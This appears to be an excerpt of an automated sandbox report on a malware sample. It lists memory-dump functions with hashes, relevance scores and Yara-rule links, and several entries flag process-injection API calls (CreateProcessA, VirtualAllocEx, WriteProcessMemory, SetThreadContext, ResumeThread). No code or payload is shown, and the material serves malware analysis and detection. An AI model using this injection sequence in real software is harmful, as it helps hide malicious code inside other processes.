                      • Opcode ID: e11f0da194dce4c5528902868b6afc6b3169710069ac3ca52d799f2e829fa124
                      • Instruction ID: bd7c92162d410e63f2c909ed6270232be680820b9141e7fb44cefffd789f3f9c
                      • Opcode Fuzzy Hash: e11f0da194dce4c5528902868b6afc6b3169710069ac3ca52d799f2e829fa124
                      • Instruction Fuzzy Hash: AD71F8B5E10218DFCB04DFE5D9856AEBBB6FF89300F10942AE815AB358EB345906CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA93B1, Relevance: .2, Instructions: 180COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50256b45220ea2161783183690ae09d6b90094d4556fc7e661580c90e0fdc24f
                      • Instruction ID: 12e4fec5867d3c42d663f440ddfcd65f94542ca73ee5e3243ce200243e86f337
                      • Opcode Fuzzy Hash: 50256b45220ea2161783183690ae09d6b90094d4556fc7e661580c90e0fdc24f
                      • Instruction Fuzzy Hash: 128107B5E11218DFCB04DFE5D9856AEBBB2FF89300F10942AE816AB358DB345906CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAA450, Relevance: .2, Instructions: 168COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b1e76b573301fdc8daaa1ac21d69c8bba7c37ae20886151ac07e0e21e5646c66
                      • Instruction ID: 7744f2e6f99c6c6f1b63123e05f64b1d452f11e89fb961cc2422eee28f482e0c
                      • Opcode Fuzzy Hash: b1e76b573301fdc8daaa1ac21d69c8bba7c37ae20886151ac07e0e21e5646c66
                      • Instruction Fuzzy Hash: 5A711776A10229DFDB24CF65C844BEDBBB2FB89300F1085EAD50AA7250E7749AC5CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAA4B5, Relevance: .2, Instructions: 162COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 692dfafb6d895a10f7b0e6aa5aa59ed0dfc1f5deeecbba31bc5cefd1fafd8108
                      • Instruction ID: ce1ee14fe6e0b9fc7fb8a24f41da3fc89ca3e138628fac945630512dad1a41a9
                      • Opcode Fuzzy Hash: 692dfafb6d895a10f7b0e6aa5aa59ed0dfc1f5deeecbba31bc5cefd1fafd8108
                      • Instruction Fuzzy Hash: A1713776A10229DFDB24CF65C844BEDBBB2FB89300F1085EAD50AA7250E7749AC5CF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0534E8E0, Relevance: .1, Instructions: 143COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bbf7cd16274e824c2a9079ece101933d98bd0533dbc064c1c3fa14d3186cc36a
                      • Instruction ID: 37922baab9d99d26e8deb67ef2e05803b945d8cee519c3bbc570bc8201aa783e
                      • Opcode Fuzzy Hash: bbf7cd16274e824c2a9079ece101933d98bd0533dbc064c1c3fa14d3186cc36a
                      • Instruction Fuzzy Hash: 995109B9D0011E9FDF44CFA9D985AAEBBF2BF88300F10A569D411EB254DB30AA458F51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAC8A8, Relevance: .1, Instructions: 85COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1cee2b7bbec3b2e8640319165810db7f42aad54528cf804d54e009b7a05ffb3e
                      • Instruction ID: 723d5e9a0c7bfef34eb36f7adf568c13e8cd079aedbc8eb37d38650d815aee8d
                      • Opcode Fuzzy Hash: 1cee2b7bbec3b2e8640319165810db7f42aad54528cf804d54e009b7a05ffb3e
                      • Instruction Fuzzy Hash: 272137B6E192199ADB00CEA9D814AFEBBF6BB4A250F005026F405F3240EB388944CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAC898, Relevance: .1, Instructions: 68COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9370021d7166c53dfda6be4c5afdf80e590c040b35e69a44d2feadd7d388f330
                      • Instruction ID: 4c69d1f2e40c50dd0ce8e6b2fea9411eda3813e62776e6160247c7dfb3c861eb
                      • Opcode Fuzzy Hash: 9370021d7166c53dfda6be4c5afdf80e590c040b35e69a44d2feadd7d388f330
                      • Instruction Fuzzy Hash: 19214AB6D252199BDB10CFA4D854BEEBBF6BB09241F155425F401F3280DB38C944CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6B1C, Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05FA6D5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: dc996feee1d8751d48f4a2b4ed526a0b5d8ea5d43f679a1885738ccfeb43de50
                      • Instruction ID: 49140c3cc4e11b6a4d7104c9aa974f0ce57ab43f6985375a6336129bd5b9690c
                      • Opcode Fuzzy Hash: dc996feee1d8751d48f4a2b4ed526a0b5d8ea5d43f679a1885738ccfeb43de50
                      • Instruction Fuzzy Hash: 37A15D72D04259CFDB24DFA4C8857EDBBB2FB48304F088569D859E7240D7789985CF92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6B28, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05FA6D5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: a1ec6f07f80d695db7b54fd2dcdb74c0f9968d3d9510ef94bf262500c6307b4c
                      • Instruction ID: 2a0da5679b4121ad05463cfd004e90becb7e73f69afb0ab5d138e2ac4de797ff
                      • Opcode Fuzzy Hash: a1ec6f07f80d695db7b54fd2dcdb74c0f9968d3d9510ef94bf262500c6307b4c
                      • Instruction Fuzzy Hash: 66915C72D04259CFDB20DFA4C885BEEBBB2FB48304F088569D815E7240D7789985CF92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7BAD8, Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 02B7BD2E
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 49c206b23d3e48480724f83e27ef1ab0eced6b19e7ac78a862753ddf46fbdd13
                      • Instruction ID: 33221170642bc1eaade832ae0940d5413011c6e43b23f417677cf5e911aa4c7c
                      • Opcode Fuzzy Hash: 49c206b23d3e48480724f83e27ef1ab0eced6b19e7ac78a862753ddf46fbdd13
                      • Instruction Fuzzy Hash: 887134B1A00B058FD724DF69D54179AB7F1FF88308F008A6AD49ADBB40DB34E9458F91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 053450F4, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                      Download Yara Rule
                      APIs
                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,?,00000001,00000000), ref: 0534568B
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: CreateFileMapping
                      • String ID:
                      • API String ID: 524692379-0
                      • Opcode ID: fdaa25acdfd8a73bcb6c0cfab6cfd8c67adb1e8630409fce39673226c6da2cc3
                      • Instruction ID: 2b595aaee72eef8a9beed88ae44644bcd538ebf337fd0d3317ffcc9f30a17b3c
                      • Opcode Fuzzy Hash: fdaa25acdfd8a73bcb6c0cfab6cfd8c67adb1e8630409fce39673226c6da2cc3
                      • Instruction Fuzzy Hash: A05105B1D043489FDB14CFA9C888B9EBBF2BF49714F258129E419BB250D7B5A844CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05345574, Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                      Download Yara Rule
                      APIs
                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,?,00000001,00000000), ref: 0534568B
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: CreateFileMapping
                      • String ID:
                      • API String ID: 524692379-0
                      • Opcode ID: a0aa0a7a9e9088ae18e8ecb274772bb5715135ae0e8a868af43f088a88fee004
                      • Instruction ID: e2ce242331dd7e7e109954ccd9fb85f7ab7a11f40324c2a25c20a4bd951be8e6
                      • Opcode Fuzzy Hash: a0aa0a7a9e9088ae18e8ecb274772bb5715135ae0e8a868af43f088a88fee004
                      • Instruction Fuzzy Hash: 615103B1D043489FDB14CFA9C888B9EBBF2BF49714F25812AE419BB251D7B5A844CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7B10C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                      Download Yara Rule
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B7DCAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 9e120cde94ef48360d5d87434140471095b66fa2ea9c3fa84262ff9e88468f80
                      • Instruction ID: eb618ea94b6a1ae85ab19927a8099922da2753f60addcd4ef56e70d916eb1881
                      • Opcode Fuzzy Hash: 9e120cde94ef48360d5d87434140471095b66fa2ea9c3fa84262ff9e88468f80
                      • Instruction Fuzzy Hash: 5551E0B1D00309DFDB14CFA9C884ADEBBB5FF88354F24816AE819AB250D7759845CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7DB8D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                      Download Yara Rule
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B7DCAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: f22c7d6b3602d5b3e67a285306d522ce907b1c6baa65ffdfdbb8ee604df5a7df
                      • Instruction ID: 30149616414d237f30a17bb199e6b11a410d2700134fe5bd49ecc7baa782668c
                      • Opcode Fuzzy Hash: f22c7d6b3602d5b3e67a285306d522ce907b1c6baa65ffdfdbb8ee604df5a7df
                      • Instruction Fuzzy Hash: 1B51EFB1D00309DFDB14CFAAD884ADEBBB5FF88314F24812AE819AB250D7709845CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05346264, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                      Download Yara Rule
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 05346321
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: ab295b54aff7212a5bb5c962c990db498b26f152eea5423d330e599a119a84d3
                      • Instruction ID: a8c085c2435d04e97ef7cade25949557bf9514869c2098d369a576774ff28c3d
                      • Opcode Fuzzy Hash: ab295b54aff7212a5bb5c962c990db498b26f152eea5423d330e599a119a84d3
                      • Instruction Fuzzy Hash: 2C4123B1C04258CFDB24CFA9C9857CDBBF1BF49304F20806AD518AB251D7B46949CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 053451A4, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 05346321
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 58d9665afb9c214be457b63841d0ed46e0a0df4d4c7cf39aac5d96e0a64170bd
                      • Instruction ID: d299a54610683e4f60a30cd037c6732bcf346ca37d175e856f3ac267efe96319
                      • Opcode Fuzzy Hash: 58d9665afb9c214be457b63841d0ed46e0a0df4d4c7cf39aac5d96e0a64170bd
                      • Instruction Fuzzy Hash: F04102B0C0465CCBDB24DFA9C984BDEBBF5BF49304F108069D519AB250D7B5694ACF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05340CD0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                      Download Yara Rule
                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05340D91
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: a3fd3b6813309d35606084874cc031cb1b8556381c47cbb269b343d4351d3556
                      • Instruction ID: 8d89dcc2bb8b472cc6c03ac8399da3e4b975556548c542b9cd0642b26f528d8c
                      • Opcode Fuzzy Hash: a3fd3b6813309d35606084874cc031cb1b8556381c47cbb269b343d4351d3556
                      • Instruction Fuzzy Hash: C4410AB9A00209CFDB14CF99C488AAABBF5FF89314F14C559D519AB321D375A845CFA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA68A0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                      Download Yara Rule
                      APIs
                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05FA6930
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 1758e740dcfab8fa99d036c7dec3567fc18088dcd7ce20ad891442e0f215b7c3
                      • Instruction ID: d6867c146158a4bdc97a9a4d29e9acdb412cb9a01019efb214f2a0f9f849866c
                      • Opcode Fuzzy Hash: 1758e740dcfab8fa99d036c7dec3567fc18088dcd7ce20ad891442e0f215b7c3
                      • Instruction Fuzzy Hash: 6C2105B2D043499FCB10CFA9C885BEEBBF5FF48314F14842AE959A7240D7789954CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6899, Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                      Download Yara Rule
                      APIs
                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05FA6930
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 44d91cef3c26ae567d592898c16637f63d95d83b1a6665e6501e59545eeaae31
                      • Instruction ID: 3d906b74d4b18a6484d4396f91b1e2b5d248255be62fa666f4ba616ab3ebc506
                      • Opcode Fuzzy Hash: 44d91cef3c26ae567d592898c16637f63d95d83b1a6665e6501e59545eeaae31
                      • Instruction Fuzzy Hash: 0B2144B6D043499FCB10CFA9C9857EEBBF5FF48314F14842AE969A7240C7789954CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B76CD3, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B76D5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 8c15987e2e2c8e62ae6fcb886f12d23e4eae5bb1d91d93e7b2357873899d3dff
                      • Instruction ID: fdd3e734f71e66321c6f30083976254331e51dc0a2e4a2fe39d47cacde36f9a0
                      • Opcode Fuzzy Hash: 8c15987e2e2c8e62ae6fcb886f12d23e4eae5bb1d91d93e7b2357873899d3dff
                      • Instruction Fuzzy Hash: 8821D8B59002089FDB10CF9AD984ADEFBF8FB48314F14845AE914B7350D378A954CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6708, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                      Download Yara Rule
                      APIs
                      • SetThreadContext.KERNEL32(?,00000000), ref: 05FA6786
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: ContextThread
                      • String ID:
                      • API String ID: 1591575202-0
                      • Opcode ID: 5539f3ed914f348c0135cfd8366e2bb6b40a9c36924064c981448fde0b7dd1fa
                      • Instruction ID: fea66c61062e2351a08c9933f56abc6368708180fafb494531f262ba2d25ded7
                      • Opcode Fuzzy Hash: 5539f3ed914f348c0135cfd8366e2bb6b40a9c36924064c981448fde0b7dd1fa
                      • Instruction Fuzzy Hash: 752115B6D043098FCB10DFAAC4857EEBBF4EF48224F14842AD559A7240DB78A945CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6990, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05FA6A10
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: c49ed601078cc4307a97dfadde72fa307b8bfcfcb7eedb3a4516409f9559c5f8
                      • Instruction ID: 217ebea77e8fda58cea73620cde0e2d8df1a7869bb981d3d039b0ec5f33c1f9f
                      • Opcode Fuzzy Hash: c49ed601078cc4307a97dfadde72fa307b8bfcfcb7eedb3a4516409f9559c5f8
                      • Instruction Fuzzy Hash: C82116B1D042499FCB10CFAAC884AEEBBF5FF48314F14842AE559A7240D7389954CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B76CD8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B76D5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: e039ac2387d5b2cb02f9cf327c9454660a5338fb50a2130d3ce575e98cc3a8c7
                      • Instruction ID: 67a550d7ca57b13002956e0d7fdad95a05472c19cdda139ee7555c29ae1ec62f
                      • Opcode Fuzzy Hash: e039ac2387d5b2cb02f9cf327c9454660a5338fb50a2130d3ce575e98cc3a8c7
                      • Instruction Fuzzy Hash: E421D5B59002089FDB10CFAAD984ADEFBF8FB48324F14845AE914A7350D374A954CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6701, Relevance: 1.6, APIs: 1, Instructions: 62threadinjectionCOMMON
                      Download Yara Rule
                      APIs
                      • SetThreadContext.KERNEL32(?,00000000), ref: 05FA6786
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: ContextThread
                      • String ID:
                      • API String ID: 1591575202-0
                      • Opcode ID: 24e88e66c2bedc4e4c7cc86e2568f0a759a99c68f05f458636ac2a7ab3fbeec8
                      • Instruction ID: 859d0000fd61abd943dc3b5e81fb589257c10e0c70bbd1c526d04c31847e17b8
                      • Opcode Fuzzy Hash: 24e88e66c2bedc4e4c7cc86e2568f0a759a99c68f05f458636ac2a7ab3fbeec8
                      • Instruction Fuzzy Hash: A52135B6D043098FCB10CFA9C5857EEBBF4EF48228F14842AD559A7240DB78A945CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6989, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05FA6A10
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: df7dac67dd4aad38a0ad252854765e994a25a469415de4197afd6e1d1240d233
                      • Instruction ID: 9fa0a655e1d26c0194ce3e179ef6c5e93cf467ac9a728b6de77e29c647c44cf7
                      • Opcode Fuzzy Hash: df7dac67dd4aad38a0ad252854765e994a25a469415de4197afd6e1d1240d233
                      • Instruction Fuzzy Hash: 092125B2D043499FCB10CFA9D9847EEBBF5FF48314F14842AE569A7240D7389954CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05345828, Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                      Download Yara Rule
                      APIs
                      • MapViewOfFile.KERNEL32(?,?,?,00000001,00000004), ref: 053458B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: FileView
                      • String ID:
                      • API String ID: 3314676101-0
                      • Opcode ID: e3cb682ee11240d408be2d4d20f6ba3ebe9d5e364e54ad4da1dbe6889d798ae7
                      • Instruction ID: 37693902e6bc12fd28c3ea2b4228f6ea883355dbe484337bb0c113eea4492708
                      • Opcode Fuzzy Hash: e3cb682ee11240d408be2d4d20f6ba3ebe9d5e364e54ad4da1dbe6889d798ae7
                      • Instruction Fuzzy Hash: CA2105B19042489FCB11CF99D888B8EFFF4EF88324F19C059E919AB261D775A454CF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05345830, Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                      Download Yara Rule
                      APIs
                      • MapViewOfFile.KERNEL32(?,?,?,00000001,00000004), ref: 053458B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID: FileView
                      • String ID:
                      • API String ID: 3314676101-0
                      • Opcode ID: 4d2d50344de16b7ddd78be9154aec9287c54d927ea6f04761ece1a0d73262c23
                      • Instruction ID: ff0b34c0d16175a34258c26692abd715adaf0f83b564b1cd00bde9d6a0477c1c
                      • Opcode Fuzzy Hash: 4d2d50344de16b7ddd78be9154aec9287c54d927ea6f04761ece1a0d73262c23
                      • Instruction Fuzzy Hash: 0321E4B1904248DFCB10CF9AD888B8EFBF4AF88324F15C059E918AB261D775A844CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7AFD0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B7BDA9,00000800,00000000,00000000), ref: 02B7BFBA
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 9cd4327c78b40276d8483d09504858e0fce4506842b4068136cf8e3f06a1ce83
                      • Instruction ID: de73a40e1047de728e95bdbfae5cfcd3a2ec368927aaadd87b1482d044d2dcb4
                      • Opcode Fuzzy Hash: 9cd4327c78b40276d8483d09504858e0fce4506842b4068136cf8e3f06a1ce83
                      • Instruction Fuzzy Hash: 0E1114B29042088FCB10CFAAD844BDFFBF4EB88714F10846EE529AB600C375A545CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA67E0, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05FA684E
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 9d573077f938fced1cbab668f7a995ced9d523df728fc6a2bfbd64c824d3db9d
                      • Instruction ID: 9ded316a1252b5bd14593bb3bca2f5a9d55f6298dff5c18530e44a143f64585c
                      • Opcode Fuzzy Hash: 9d573077f938fced1cbab668f7a995ced9d523df728fc6a2bfbd64c824d3db9d
                      • Instruction Fuzzy Hash: D7113772D042489FCB10CFAAC844BDFBBF9EF48324F148429E529A7250D7799954CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7BF49, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02B7BDA9,00000800,00000000,00000000), ref: 02B7BFBA
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 70761b8a76e2907c5158365f31bad9d825effb2091ea939700dd00c56a14418f
                      • Instruction ID: 6f3e17ed02f75f754d42b287436accd12f2291ee7729222e790f14c0816f9049
                      • Opcode Fuzzy Hash: 70761b8a76e2907c5158365f31bad9d825effb2091ea939700dd00c56a14418f
                      • Instruction Fuzzy Hash: A61114B69002088FCB10CFAAD544BDEFBF4EB48314F14846AD429B7600C378A545CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA67D9, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05FA684E
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: fe1fe4f8b45ac1ac136496c47d99c789f511d88c44c05b3ad599843590ed77f9
                      • Instruction ID: 0086ebdcc2b74d3e1364bcdfe7fe085635317aa554e8124673e56925b80a4d34
                      • Opcode Fuzzy Hash: fe1fe4f8b45ac1ac136496c47d99c789f511d88c44c05b3ad599843590ed77f9
                      • Instruction Fuzzy Hash: 3D1126B6D042488FCB10CFA9C9447EFBBF5AF48314F14842AD569A7250D7399954CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6658, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: e76bd2f58dd59d35b2586e670e726631f120adea1f981f80ca39609e1f13538e
                      • Instruction ID: 324203cda414eddb5853bb7dce38d51098f508e3142be7451fe7c1db6582a105
                      • Opcode Fuzzy Hash: e76bd2f58dd59d35b2586e670e726631f120adea1f981f80ca39609e1f13538e
                      • Instruction Fuzzy Hash: 5B113AB1D043488BCB10DFAAC4447DFFBF4EB88224F148429D529A7740C779A944CBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA6650, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: cc6c2544da14021783c7a8cbf056d217ba2a0a6e999465a0929d89e209af15cb
                      • Instruction ID: 46aca3a5b718f33a6165660aa1c0b72936ceba3102ca3cf6bfbed467f1544c4d
                      • Opcode Fuzzy Hash: cc6c2544da14021783c7a8cbf056d217ba2a0a6e999465a0929d89e209af15cb
                      • Instruction Fuzzy Hash: 551158B2D442088BCB10DFA9D8457EEFBF4AB88214F14842AC529A7740C738A944CFA1
